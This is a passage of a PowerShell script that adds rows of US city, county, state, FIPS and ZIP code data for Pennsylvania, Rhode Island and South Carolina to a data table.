darby","Delaware","Pennsylvania","PA","42","19082") + $null = $Cities.Rows.Add("Havertown","Delaware","Pennsylvania","PA","42","19083") + $null = $Cities.Rows.Add("Villanova","Delaware","Pennsylvania","PA","42","19085") + $null = $Cities.Rows.Add("Wallingford","Delaware","Pennsylvania","PA","42","19086") + $null = $Cities.Rows.Add("Radnor","Chester","Pennsylvania","PA","42","19087") + $null = $Cities.Rows.Add("Willow grove nas","Montgomery","Pennsylvania","PA","42","19090") + $null = $Cities.Rows.Add("Woodlyn","Delaware","Pennsylvania","PA","42","19094") + $null = $Cities.Rows.Add("Wyncote","Montgomery","Pennsylvania","PA","42","19095") + $null = $Cities.Rows.Add("Wynnewood","Montgomery","Pennsylvania","PA","42","19096") + $null = $Cities.Rows.Add("Zcta 190hh","Bucks","Pennsylvania","PA","42","190HH") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19102") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19103") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19104") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19106") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19107") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19108") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19111") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19112") + $null = $Cities.Rows.Add("Philadelphia","Delaware","Pennsylvania","PA","42","19113") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19114") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19115") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19116") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19118") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19119") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19120") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19121") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19122") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19123") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19124") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19125") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19126") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19127") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19128") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19129") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19130") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19131") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19132") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19133") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19134") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19135") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19136") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19137") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19138") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19139") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19140") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19141") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19142") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19143") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19144") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19145") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19146") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19147") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19148") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19149") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19150") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19151") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19152") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19153") + $null = $Cities.Rows.Add("Philadelphia","Philadelphia","Pennsylvania","PA","42","19154") + $null = $Cities.Rows.Add("Zcta 191hh","Philadelphia","Pennsylvania","PA","42","191HH") + $null = $Cities.Rows.Add("Paoli","Chester","Pennsylvania","PA","42","19301") + $null = $Cities.Rows.Add("Atglen","Chester","Pennsylvania","PA","42","19310") + $null = $Cities.Rows.Add("Avondale","Chester","Pennsylvania","PA","42","19311") + $null = $Cities.Rows.Add("Berwyn","Chester","Pennsylvania","PA","42","19312") + $null = $Cities.Rows.Add("Brandamore","Chester","Pennsylvania","PA","42","19316") + $null = $Cities.Rows.Add("Chadds ford","Chester","Pennsylvania","PA","42","19317") + $null = $Cities.Rows.Add("Cheyney","Delaware","Pennsylvania","PA","42","19319") + $null = $Cities.Rows.Add("Coatesville","Chester","Pennsylvania","PA","42","19320") + $null = $Cities.Rows.Add("Cochranville","Chester","Pennsylvania","PA","42","19330") + $null = $Cities.Rows.Add("Devon","Chester","Pennsylvania","PA","42","19333") + $null = $Cities.Rows.Add("Downingtown","Chester","Pennsylvania","PA","42","19335") + $null = $Cities.Rows.Add("Exton","Chester","Pennsylvania","PA","42","19341") + $null = $Cities.Rows.Add("Glen mills","Delaware","Pennsylvania","PA","42","19342") + $null = $Cities.Rows.Add("Glenmoore","Chester","Pennsylvania","PA","42","19343") + $null = $Cities.Rows.Add("Honey brook","Chester","Pennsylvania","PA","42","19344") + $null = $Cities.Rows.Add("Immaculata","Chester","Pennsylvania","PA","42","19345") + $null = $Cities.Rows.Add("Kennett square","Chester","Pennsylvania","PA","42","19348") + $null = $Cities.Rows.Add("Landenberg","Chester","Pennsylvania","PA","42","19350") + $null = $Cities.Rows.Add("Lincoln universi","Chester","Pennsylvania","PA","42","19352") + $null = $Cities.Rows.Add("Frazer","Chester","Pennsylvania","PA","42","19355") + $null = $Cities.Rows.Add("Modena","Chester","Pennsylvania","PA","42","19358") + $null = $Cities.Rows.Add("Nottingham","Chester","Pennsylvania","PA","42","19362") + $null = $Cities.Rows.Add("Oxford","Chester","Pennsylvania","PA","42","19363") + $null = $Cities.Rows.Add("Parkesburg","Chester","Pennsylvania","PA","42","19365") + $null = $Cities.Rows.Add("Pomeroy","Chester","Pennsylvania","PA","42","19367") + $null = $Cities.Rows.Add("Sadsburyville","Chester","Pennsylvania","PA","42","19369") + $null = $Cities.Rows.Add("Thorndale","Chester","Pennsylvania","PA","42","19372") + $null = $Cities.Rows.Add("Thornton","Delaware","Pennsylvania","PA","42","19373") + $null = $Cities.Rows.Add("Toughkenamon","Chester","Pennsylvania","PA","42","19374") + $null = $Cities.Rows.Add("West chester","Chester","Pennsylvania","PA","42","19380") + $null = $Cities.Rows.Add("West chester","Chester","Pennsylvania","PA","42","19382") + $null = $Cities.Rows.Add("West grove","Chester","Pennsylvania","PA","42","19390") + $null = $Cities.Rows.Add("Zcta 193hh","Chester","Pennsylvania","PA","42","193HH") + $null = $Cities.Rows.Add("Norristown","Montgomery","Pennsylvania","PA","42","19401") + $null = $Cities.Rows.Add("Eagleville","Montgomery","Pennsylvania","PA","42","19403") + $null = $Cities.Rows.Add("Bridgeport","Montgomery","Pennsylvania","PA","42","19405") + $null = $Cities.Rows.Add("King of prussia","Montgomery","Pennsylvania","PA","42","19406") + $null = $Cities.Rows.Add("Birchrunville","Chester","Pennsylvania","PA","42","19421") + $null = $Cities.Rows.Add("Penllyn","Montgomery","Pennsylvania","PA","42","19422") + $null = $Cities.Rows.Add("Chester springs","Chester","Pennsylvania","PA","42","19425") + $null = $Cities.Rows.Add("Collegeville","Montgomery","Pennsylvania","PA","42","19426") + $null = $Cities.Rows.Add("West conshohocke","Montgomery","Pennsylvania","PA","42","19428") + $null = $Cities.Rows.Add("Frederick","Montgomery","Pennsylvania","PA","42","19435") + $null = $Cities.Rows.Add("Gwynedd","Montgomery","Pennsylvania","PA","42","19436") + $null = $Cities.Rows.Add("Gwynedd valley","Montgomery","Pennsylvania","PA","42","19437") + $null = $Cities.Rows.Add("Harleysville","Montgomery","Pennsylvania","PA","42","19438") + $null = $Cities.Rows.Add("Hatfield","Montgomery","Pennsylvania","PA","42","19440") + $null = $Cities.Rows.Add("Lafayette hill","Montgomery","Pennsylvania","PA","42","19444") + $null = $Cities.Rows.Add("Lansdale","Montgomery","Pennsylvania","PA","42","19446") + $null = $Cities.Rows.Add("Mont clare","Montgomery","Pennsylvania","PA","42","19453") + $null = $Cities.Rows.Add("North wales","Montgomery","Pennsylvania","PA","42","19454") + $null = $Cities.Rows.Add("Parker ford","Chester","Pennsylvania","PA","42","19457") + $null = $Cities.Rows.Add("Phoenixville","Chester","Pennsylvania","PA","42","19460") + $null = $Cities.Rows.Add("Plymouth meeting","Montgomery","Pennsylvania","PA","42","19462") + $null = $Cities.Rows.Add("Sanatoga","Montgomery","Pennsylvania","PA","42","19464") + $null = $Cities.Rows.Add("Pottstown","Chester","Pennsylvania","PA","42","19465") + $null = $Cities.Rows.Add("Limerick","Montgomery","Pennsylvania","PA","42","19468") + $null = $Cities.Rows.Add("Sassamansville","Montgomery","Pennsylvania","PA","42","19472") + $null = $Cities.Rows.Add("Schwenksville","Montgomery","Pennsylvania","PA","42","19473") + $null = $Cities.Rows.Add("Skippack","Montgomery","Pennsylvania","PA","42","19474") + $null = $Cities.Rows.Add("Spring city","Chester","Pennsylvania","PA","42","19475") + $null = $Cities.Rows.Add("Spring mount","Montgomery","Pennsylvania","PA","42","19478") + $null = $Cities.Rows.Add("Zieglersville","Montgomery","Pennsylvania","PA","42","19492") + $null = $Cities.Rows.Add("Zcta 194hh","Chester","Pennsylvania","PA","42","194HH") + $null = $Cities.Rows.Add("Adamstown","Lancaster","Pennsylvania","PA","42","19501") + $null = $Cities.Rows.Add("Bally","Berks","Pennsylvania","PA","42","19503") + $null = $Cities.Rows.Add("Barto","Berks","Pennsylvania","PA","42","19504") + $null = $Cities.Rows.Add("Bechtelsville","Berks","Pennsylvania","PA","42","19505") + $null = $Cities.Rows.Add("Bernville","Berks","Pennsylvania","PA","42","19506") + $null = $Cities.Rows.Add("Bethel","Berks","Pennsylvania","PA","42","19507") + $null = $Cities.Rows.Add("Birdsboro","Berks","Pennsylvania","PA","42","19508") + $null = $Cities.Rows.Add("Blandon","Berks","Pennsylvania","PA","42","19510") + $null = $Cities.Rows.Add("Bowers","Berks","Pennsylvania","PA","42","19511") + $null = $Cities.Rows.Add("Boyertown","Berks","Pennsylvania","PA","42","19512") + $null = $Cities.Rows.Add("Centerport","Berks","Pennsylvania","PA","42","19516") + $null = $Cities.Rows.Add("Douglassville","Berks","Pennsylvania","PA","42","19518") + $null = $Cities.Rows.Add("Earlville","Berks","Pennsylvania","PA","42","19519") + $null = $Cities.Rows.Add("Elverson","Chester","Pennsylvania","PA","42","19520") + $null = $Cities.Rows.Add("Evansville","Berks","Pennsylvania","PA","42","19522") + $null = $Cities.Rows.Add("Geigertown","Berks","Pennsylvania","PA","42","19523") + $null = $Cities.Rows.Add("Gilbertsville","Montgomery","Pennsylvania","PA","42","19525") + $null = $Cities.Rows.Add("Hamburg","Berks","Pennsylvania","PA","42","19526") + $null = $Cities.Rows.Add("Kempton","Berks","Pennsylvania","PA","42","19529") + $null = $Cities.Rows.Add("Kutztown","Berks","Pennsylvania","PA","42","19530") + $null = $Cities.Rows.Add("Leesport","Berks","Pennsylvania","PA","42","19533") + $null = $Cities.Rows.Add("Lenhartsville","Berks","Pennsylvania","PA","42","19534") + $null = $Cities.Rows.Add("Lyon station","Berks","Pennsylvania","PA","42","19536") + $null = $Cities.Rows.Add("Mertztown","Berks","Pennsylvania","PA","42","19539") + $null = $Cities.Rows.Add("Mohnton","Berks","Pennsylvania","PA","42","19540") + $null = $Cities.Rows.Add("Mohrsville","Berks","Pennsylvania","PA","42","19541") + $null = $Cities.Rows.Add("Morgantown","Berks","Pennsylvania","PA","42","19543") + $null = $Cities.Rows.Add("Mount aetna","Berks","Pennsylvania","PA","42","19544") + $null = $Cities.Rows.Add("New berlinville","Berks","Pennsylvania","PA","42","19545") + $null = $Cities.Rows.Add("Oley","Berks","Pennsylvania","PA","42","19547") + $null = $Cities.Rows.Add("Port clinton","Schuylkill","Pennsylvania","PA","42","19549") + $null = $Cities.Rows.Add("Rehrersburg","Berks","Pennsylvania","PA","42","19550") + $null = $Cities.Rows.Add("Robesonia","Berks","Pennsylvania","PA","42","19551") + $null = $Cities.Rows.Add("Shartlesville","Berks","Pennsylvania","PA","42","19554") + $null = $Cities.Rows.Add("Shoemakersville","Berks","Pennsylvania","PA","42","19555") + $null = $Cities.Rows.Add("Strausstown","Berks","Pennsylvania","PA","42","19559") + $null = $Cities.Rows.Add("Temple","Berks","Pennsylvania","PA","42","19560") + $null = $Cities.Rows.Add("Topton","Berks","Pennsylvania","PA","42","19562") + $null = $Cities.Rows.Add("Wernersville","Berks","Pennsylvania","PA","42","19565") + $null = $Cities.Rows.Add("Womelsdorf","Berks","Pennsylvania","PA","42","19567") + $null = $Cities.Rows.Add("Zcta 195hh","Berks","Pennsylvania","PA","42","195HH") + $null = $Cities.Rows.Add("Reading","Berks","Pennsylvania","PA","42","19601") + $null = $Cities.Rows.Add("Reading","Berks","Pennsylvania","PA","42","19602") + $null = $Cities.Rows.Add("Reading","Berks","Pennsylvania","PA","42","19604") + $null = $Cities.Rows.Add("Reading","Berks","Pennsylvania","PA","42","19605") + $null = $Cities.Rows.Add("Mount penn","Berks","Pennsylvania","PA","42","19606") + $null = $Cities.Rows.Add("Shillington","Berks","Pennsylvania","PA","42","19607") + $null = $Cities.Rows.Add("Sinking spring","Berks","Pennsylvania","PA","42","19608") + $null = $Cities.Rows.Add("West lawn","Berks","Pennsylvania","PA","42","19609") + $null = $Cities.Rows.Add("Wyomissing","Berks","Pennsylvania","PA","42","19610") + $null = $Cities.Rows.Add("Reading","Berks","Pennsylvania","PA","42","19611") + $null = $Cities.Rows.Add("Zcta 196hh","Berks","Pennsylvania","PA","42","196HH") + $null = $Cities.Rows.Add("Ashaway","Washington","Rhode island","RI","44","02804") + $null = $Cities.Rows.Add("Barrington","Bristol","Rhode island","RI","44","02806") + $null = $Cities.Rows.Add("Block island","Washington","Rhode island","RI","44","02807") + $null = $Cities.Rows.Add("Bradford","Washington","Rhode island","RI","44","02808") + $null = $Cities.Rows.Add("Bristol","Bristol","Rhode island","RI","44","02809") + $null = $Cities.Rows.Add("Richmond","Washington","Rhode island","RI","44","02812") + $null = $Cities.Rows.Add("Charlestown","Washington","Rhode island","RI","44","02813") + $null = $Cities.Rows.Add("Chepachet","Providence","Rhode island","RI","44","02814") + $null = $Cities.Rows.Add("Clayville","Providence","Rhode island","RI","44","02815") + $null = $Cities.Rows.Add("Coventry","Kent","Rhode island","RI","44","02816") + $null = $Cities.Rows.Add("West greenwich","Kent","Rhode island","RI","44","02817") + $null = $Cities.Rows.Add("East greenwich","Kent","Rhode island","RI","44","02818") + $null = $Cities.Rows.Add("Exeter","Washington","Rhode island","RI","44","02822") + $null = $Cities.Rows.Add("Foster","Providence","Rhode island","RI","44","02825") + $null = $Cities.Rows.Add("Greene","Kent","Rhode island","RI","44","02827") + $null = $Cities.Rows.Add("Greenville","Providence","Rhode island","RI","44","02828") + $null = $Cities.Rows.Add("Harrisville","Providence","Rhode island","RI","44","02830") + $null = $Cities.Rows.Add("Hope","Providence","Rhode island","RI","44","02831") + $null = $Cities.Rows.Add("Richmond","Washington","Rhode island","RI","44","02832") + $null = $Cities.Rows.Add("Hopkinton","Washington","Rhode island","RI","44","02833") + $null = $Cities.Rows.Add("Jamestown","Newport","Rhode island","RI","44","02835") + $null = $Cities.Rows.Add("Richmond","Washington","Rhode island","RI","44","02836") + $null = $Cities.Rows.Add("Little compton","Newport","Rhode island","RI","44","02837") + $null = $Cities.Rows.Add("Manville","Providence","Rhode island","RI","44","02838") + $null = $Cities.Rows.Add("Mapleville","Providence","Rhode island","RI","44","02839") + $null = $Cities.Rows.Add("Middletown","Newport","Rhode island","RI","44","02840") + $null = $Cities.Rows.Add("Middletown","Newport","Rhode island","RI","44","02842") + $null = $Cities.Rows.Add("North kingstown","Washington","Rhode island","RI","44","02852") + $null = $Cities.Rows.Add("North scituate","Providence","Rhode island","RI","44","02857") + $null = $Cities.Rows.Add("Oakland","Providence","Rhode island","RI","44","02858") + $null = $Cities.Rows.Add("Pascoag","Providence","Rhode island","RI","44","02859") + $null = $Cities.Rows.Add("Pawtucket","Providence","Rhode island","RI","44","02860") + $null = $Cities.Rows.Add("Pawtucket","Providence","Rhode island","RI","44","02861") + $null = $Cities.Rows.Add("Central falls","Providence","Rhode island","RI","44","02863") + $null = $Cities.Rows.Add("Cumberland","Providence","Rhode island","RI","44","02864") + $null = $Cities.Rows.Add("Lincoln","Providence","Rhode island","RI","44","02865") + $null = $Cities.Rows.Add("Portsmouth","Newport","Rhode island","RI","44","02871") + $null = $Cities.Rows.Add("Saunderstown","Washington","Rhode island","RI","44","02874") + $null = $Cities.Rows.Add("Richmond","Washington","Rhode island","RI","44","02875") + $null = $Cities.Rows.Add("Tiverton","Newport","Rhode island","RI","44","02878") + $null = $Cities.Rows.Add("Narragansett","Washington","Rhode island","RI","44","02879") + $null = $Cities.Rows.Add("Kingston","Washington","Rhode island","RI","44","02881") + $null = $Cities.Rows.Add("Narragansett","Washington","Rhode island","RI","44","02882") + $null = $Cities.Rows.Add("Warren","Bristol","Rhode island","RI","44","02885") + $null = $Cities.Rows.Add("Warwick","Kent","Rhode island","RI","44","02886") + $null = $Cities.Rows.Add("Warwick","Kent","Rhode island","RI","44","02888") + $null = $Cities.Rows.Add("Warwick","Kent","Rhode island","RI","44","02889") + $null = $Cities.Rows.Add("Westerly","Washington","Rhode island","RI","44","02891") + $null = $Cities.Rows.Add("Richmond","Washington","Rhode island","RI","44","02892") + $null = $Cities.Rows.Add("West warwick","Kent","Rhode island","RI","44","02893") + $null = $Cities.Rows.Add("Wood river junct","Washington","Rhode island","RI","44","02894") + $null = $Cities.Rows.Add("North smithfield","Providence","Rhode island","RI","44","02895") + $null = $Cities.Rows.Add("North smithfield","Providence","Rhode island","RI","44","02896") + $null = $Cities.Rows.Add("Richmond","Washington","Rhode island","RI","44","02898") + $null = $Cities.Rows.Add("Zcta 028hh","Bristol","Rhode island","RI","44","028HH") + $null = $Cities.Rows.Add("Providence","Providence","Rhode island","RI","44","02903") + $null = $Cities.Rows.Add("Centredale","Providence","Rhode island","RI","44","02904") + $null = $Cities.Rows.Add("Cranston","Providence","Rhode island","RI","44","02905") + $null = $Cities.Rows.Add("Providence","Providence","Rhode island","RI","44","02906") + $null = $Cities.Rows.Add("Cranston","Providence","Rhode island","RI","44","02907") + $null = $Cities.Rows.Add("Providence","Providence","Rhode island","RI","44","02908") + $null = $Cities.Rows.Add("Cranston","Providence","Rhode island","RI","44","02909") + $null = $Cities.Rows.Add("Cranston","Providence","Rhode island","RI","44","02910") + $null = $Cities.Rows.Add("Centredale","Providence","Rhode island","RI","44","02911") + $null = $Cities.Rows.Add("East providence","Providence","Rhode island","RI","44","02914") + $null = $Cities.Rows.Add("Riverside","Providence","Rhode island","RI","44","02915") + $null = $Cities.Rows.Add("Rumford","Providence","Rhode island","RI","44","02916") + $null = $Cities.Rows.Add("Smithfield","Providence","Rhode island","RI","44","02917") + $null = $Cities.Rows.Add("Cranston","Providence","Rhode island","RI","44","02919") + $null = $Cities.Rows.Add("Cranston","Providence","Rhode island","RI","44","02920") + $null = $Cities.Rows.Add("Cranston","Providence","Rhode island","RI","44","02921") + $null = $Cities.Rows.Add("Zcta 029hh","Providence","Rhode island","RI","44","029HH") + $null = $Cities.Rows.Add("Alcolu","Clarendon","South carolina","SC","45","29001") + $null = $Cities.Rows.Add("Bamberg","Bamberg","South carolina","SC","45","29003") + $null = $Cities.Rows.Add("Batesburg","Lexington","South carolina","SC","45","29006") + $null = $Cities.Rows.Add("Bethune","Kershaw","South carolina","SC","45","29009") + $null = $Cities.Rows.Add("Bishopville","Lee","South carolina","SC","45","29010") + $null = $Cities.Rows.Add("Blackstock","Chester","South carolina","SC","45","29014") + $null = $Cities.Rows.Add("Blair","Fairfield","South carolina","SC","45","29015") + $null = $Cities.Rows.Add("Blythewood","Richland","South carolina","SC","45","29016") + $null = $Cities.Rows.Add("Bowman","Orangeburg","South carolina","SC","45","29018") + $null = $Cities.Rows.Add("Camden","Kershaw","South carolina","SC","45","29020") + $null = $Cities.Rows.Add("Cameron","Calhoun","South carolina","SC","45","29030") + $null = $Cities.Rows.Add("Carlisle","Union","South carolina","SC","45","29031") + $null = $Cities.Rows.Add("Cassatt","Kershaw","South carolina","SC","45","29032") + $null = $Cities.Rows.Add("Cayce","Lexington","South carolina","SC","45","29033") + $null = $Cities.Rows.Add("Chapin","Lexington","South carolina","SC","45","29036") + $null = $Cities.Rows.Add("Chappells","Newberry","South carolina","SC","45","29037") + $null = $Cities.Rows.Add("Cope","Orangeburg","South carolina","SC","45","29038") + $null = $Cities.Rows.Add("Cordova","Orangeburg","South carolina","SC","45","29039") + $null = $Cities.Rows.Add("Dalzell","Sumter","South carolina","SC","45","29040") + $null = $Cities.Rows.Add("Denmark","Bamberg","South carolina","SC","45","29042") + $null = $Cities.Rows.Add("Eastover","Richland","South carolina","SC","45","29044") + $null = $Cities.Rows.Add("Elgin","Kershaw","South carolina","SC","45","29045") + $null = $Cities.Rows.Add("Elliott","Lee","South carolina","SC","45","29046") + $null = $Cities.Rows.Add("Elloree","Orangeburg","South carolina","SC","45","29047") + $null = $Cities.Rows.Add("Eutawville","Orangeburg","South carolina","SC","45","29048") + $null = $Cities.Rows.Add("Gable","Sumter","South carolina","SC","45","29051") + $null = $Cities.Rows.Add("Gadsden","Richland","South carolina","SC","45","29052") + $null = $Cities.Rows.Add("Gaston","Lexington","South carolina","SC","45","29053") + $null = $Cities.Rows.Add("Gilbert","Lexington","South carolina","SC","45","29054") + $null = $Cities.Rows.Add("Great falls","Chester","South carolina","SC","45","29055") + $null = $Cities.Rows.Add("Greeleyville","Williamsburg","South carolina","SC","45","29056") + $null = $Cities.Rows.Add("Heath springs","Lancaster","South carolina","SC","45","29058") + $null = $Cities.Rows.Add("Holly hill","Orangeburg","South carolina","SC","45","29059") + $null = $Cities.Rows.Add("Hopkins","Richland","South carolina","SC","45","29061") + $null = $Cities.Rows.Add("Horatio","Sumter","South carolina","SC","45","29062") + $null = $Cities.Rows.Add("Irmo","Richland","South carolina","SC","45","29063") + $null = $Cities.Rows.Add("Jenkinsville","Fairfield","South carolina","SC","45","29065") + $null = $Cities.Rows.Add("Kershaw","Lancaster","South carolina","SC","45","29067") + $null = $Cities.Rows.Add("Lamar","Darlington","South carolina","SC","45","29069") + $null = $Cities.Rows.Add("Leesville","Lexington","South carolina","SC","45","29070") + $null = $Cities.Rows.Add("Lexington","Lexington","South carolina","SC","45","29072") + $null = $Cities.Rows.Add("Lexington","Lexington","South carolina","SC","45","29073") + $null = $Cities.Rows.Add("Liberty hill","Kershaw","South carolina","SC","45","29074") + $null = $Cities.Rows.Add("Little mountain","Newberry","South carolina","SC","45","29075") + $null = $Cities.Rows.Add("Lugoff","Kershaw","South carolina","SC","45","29078") + $null = $Cities.Rows.Add("Lydia","Darlington","South carolina","SC","45","29079") + $null = $Cities.Rows.Add("Lynchburg","Lee","South carolina","SC","45","29080") + $null = $Cities.Rows.Add("Ehrhardt","Bamberg","South carolina","SC","45","29081") + $null = $Cities.Rows.Add("Lodge","Colleton","South carolina","SC","45","29082") + $null = $Cities.Rows.Add("Zcta 290hh","Calhoun","South carolina","SC","45","290HH") + $null = $Cities.Rows.Add("Zcta 290xx","Richland","South carolina","SC","45","290XX") + $null = $Cities.Rows.Add("Mc bee","Chesterfield","South carolina","SC","45","29101") + $null = $Cities.Rows.Add("Paxville","Clarendon","South carolina","SC","45","29102") + $null = $Cities.Rows.Add("Saint charles","Sumter","South carolina","SC","45","29104") + $null = $Cities.Rows.Add("Monetta","Aiken","South carolina","SC","45","29105") + $null = $Cities.Rows.Add("Neeses","Orangeburg","South carolina","SC","45","29107") + $null = $Cities.Rows.Add("Newberry","Newberry","South carolina","SC","45","29108") + $null = $Cities.Rows.Add("New zion","Clarendon","South carolina","SC","45","29111") + $null = $Cities.Rows.Add("North","Orangeburg","South carolina","SC","45","29112") + $null = $Cities.Rows.Add("Norway","Orangeburg","South carolina","SC","45","29113") + $null = $Cities.Rows.Add("Olanta","Florence","South carolina","SC","45","29114") + $null = $Cities.Rows.Add("Orangeburg","Orangeburg","South carolina","SC","45","29115") + $null = $Cities.Rows.Add("Zcta 29118","Orangeburg","South carolina","SC","45","29118") + $null = $Cities.Rows.Add("Peak","Newberry","South carolina","SC","45","29122") + $null = $Cities.Rows.Add("Pelion","Lexington","South carolina","SC","45","29123") + $null = $Cities.Rows.Add("Perry","Aiken","South carolina","SC","45","29124") + $null = $Cities.Rows.Add("Pinewood","Sumter","South carolina","SC","45","29125") + $null = $Cities.Rows.Add("Pomaria","Newberry","South carolina","SC","45","29126") + $null = $Cities.Rows.Add("Prosperity","Newberry","South carolina","SC","45","29127") + $null = $Cities.Rows.Add("Rembert","Sumter","South carolina","SC","45","29128") + $null = $Cities.Rows.Add("Ridge spring","Aiken","South carolina","SC","45","29129") + $null = $Cities.Rows.Add("Ridgeway","Fairfield","South carolina","SC","45","29130") + $null = $Cities.Rows.Add("Rion","Fairfield","South carolina","SC","45","29132") + $null = $Cities.Rows.Add("Rowesville","Orangeburg","South carolina","SC","45","29133") + $null = $Cities.Rows.Add("Fort motte","Calhoun","South carolina","SC","45","29135") + $null = $Cities.Rows.Add("Salley","Aiken","South carolina","SC","45","29137") + $null = $Cities.Rows.Add("Saluda","Saluda","South carolina","SC","45","29138") + $null = $Cities.Rows.Add("Santee","Orangeburg","South carolina","SC","45","29142") + $null = $Cities.Rows.Add("Silverstreet","Newberry","South carolina","SC","45","29145") + $null = $Cities.Rows.Add("Springfield","Orangeburg","South carolina","SC","45","29146") + $null = $Cities.Rows.Add("Summerton","Clarendon","South carolina","SC","45","29148") + $null = $Cities.Rows.Add("Oswego","Sumter","South carolina","SC","45","29150") + $null = $Cities.Rows.Add("Shaw a f b","Sumter","South carolina","SC","45","29152") + $null = $Cities.Rows.Add("Sumter","Sumter","South carolina","SC","45","29153") + $null = $Cities.Rows.Add("Sumter","Sumter","South carolina","SC","45","29154") + $null = $Cities.Rows.Add("Swansea","Lexington","South carolina","SC","45","29160") + $null = $Cities.Rows.Add("Timmonsville","Florence","South carolina","SC","45","29161") + $null = $Cities.Rows.Add("Turbeville","Clarendon","South carolina","SC","45","29162") + $null = $Cities.Rows.Add("Vance","Orangeburg","South carolina","SC","45","29163") + $null = $Cities.Rows.Add("Wagener","Aiken","South carolina","SC","45","29164") + $null = $Cities.Rows.Add("Ward","Saluda","South carolina","SC","45","29166") + $null = $Cities.Rows.Add("Wedgefield","Sumter","South carolina","SC","45","29168") + $null = $Cities.Rows.Add("West columbia","Lexington","South carolina","SC","45","29169") + $null = $Cities.Rows.Add("West columbia","Lexington","South carolina","SC","45","29170") + $null = $Cities.Rows.Add("West columbia","Lexington","South carolina","SC","45","29172") + $null = $Cities.Rows.Add("Westville","Kershaw","South carolina","SC","45","29175") + $null = $Cities.Rows.Add("White rock","Richland","South carolina","SC","45","29177") + $null = $Cities.Rows.Add("Whitmire","Newberry","South carolina","SC","45","29178") + $null = $Cities.Rows.Add("Winnsboro","Fairfield","South carolina","SC","45","29180") + $null = $Cities.Rows.Add("Zcta 291hh","Chesterfield","South carolina","SC","45","291HH") + $null = $Cities.Rows.Add("Zcta 291xx","Calhoun","South carolina","SC","45","291XX") + $null = $Cities.Rows.Add("Columbia","Richland","South carolina","SC","45","29201") + $null = $Cities.Rows.Add("Columbia","Richland","South carolina","SC","45","29202") + $null = $Cities.Rows.Add("Columbia","Richland","South carolina","SC","45","29203") + $null = $Cities.Rows.Add("Columbia","Richland","South carolina","SC","45","29204") + $null = $Cities.Rows.Add("Columbia","Richland","South carolina","SC","45","29205") + $null = $Cities.Rows.Add("Columbia","Richland","South carolina","SC","45","29206") + $null = $Cities.Rows.Add("Columbia","Richland","South carolina","SC","45","29207") + $null = $Cities.Rows.Add("Columbia","Richland","South carolina","SC","45","29209") + $null = $Cities.Rows.Add("Columbia","Richland","South carolina","SC","45","29210") + $null = $Cities.Rows.Add("Columbia","Lexington","South carolina","SC","45","29212") + $null = $Cities.Rows.Add("Columbia","Richland","South carolina","SC","45","29223") + $null = $Cities.Rows.Add("Columbia","Richland","South carolina","SC","45","29229") + 